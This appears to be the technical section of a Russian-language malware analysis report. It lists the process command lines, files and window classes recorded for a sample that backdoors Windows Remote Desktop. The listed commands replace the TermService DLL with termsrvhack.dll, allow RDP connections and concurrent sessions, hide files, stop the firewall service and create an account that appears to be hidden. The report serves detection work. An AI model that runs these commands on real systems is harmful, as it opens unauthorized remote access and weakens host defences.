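Техническая информация
Ниже перечислены командные строки процессов, пути к файлам и классы окон; `<SYSTEM32>` обозначает системный каталог Windows. Заголовки подразделов исходного отчёта, по-видимому, утрачены при извлечении текста, поэтому роль повторяющихся путей (например, создан файл или удалён) по этому списку определить нельзя. Для обнаружения наиболее показательны изменения реестра и служб: значение serviceDll службы TermService указывает на termsrvhack.dll, fDenyTSConnections установлен в 0, EnableConcurrentSessions — в 1, служба sharedaccess остановлена.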
- 'C:\CHAdmin.exe' ghost$ admin888
- '<SYSTEM32>\reg.exe' add HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v serviceDll /t REG_EXPAND_SZ /d <SYSTEM32>\termsrvhack.dll /f
- '<SYSTEM32>\attrib.exe' +h +s +r <SYSTEM32>\dllcache\termsrvhack.dll
- '<SYSTEM32>\reg.exe' add HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
- '<SYSTEM32>\reg.exe' add HKLM\SYSTEM\CurrentControlSet\control\terminal" "server\Licensing" "Core /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
- '<SYSTEM32>\net1.exe' start termservice
- '<SYSTEM32>\svchost.exe' -k DComLaunch
- '<SYSTEM32>\attrib.exe' +h +s +r <SYSTEM32>\termsrvhack.dll
- '<SYSTEM32>\shutdown.exe' -a
- '<SYSTEM32>\net.exe' stop sharedaccess
- '<SYSTEM32>\net1.exe' stop sharedaccess
- '<SYSTEM32>\wscript.exe' "c:\3389.vbs"
- '<SYSTEM32>\cmd.exe' /c ""c:\3389.bat" /start"
- '<SYSTEM32>\ntsd.exe' -c q -p 848
- '<SYSTEM32>\reg.exe' add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon /v KeepRASConnections /t REG_SZ /d 1 /f
- '<SYSTEM32>\tasklist.exe' /svc
- '<SYSTEM32>\findstr.exe' /i "TermService" pid.txt
- <SYSTEM32>\svchost.exe
- C:\pid.txt
- C:\result.txt
- <SYSTEM32>\dllcache\termsrvhack.dll
- C:\3389.bat
- C:\3389.vbs
- C:\CHAdmin.exe
- C:\termsrvhack.dll
- <SYSTEM32>\dllcache\termsrvhack.dll
- C:\CHAdmin.exe
- C:\3389.vbs
- C:\result.txt
- C:\pid.txt
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'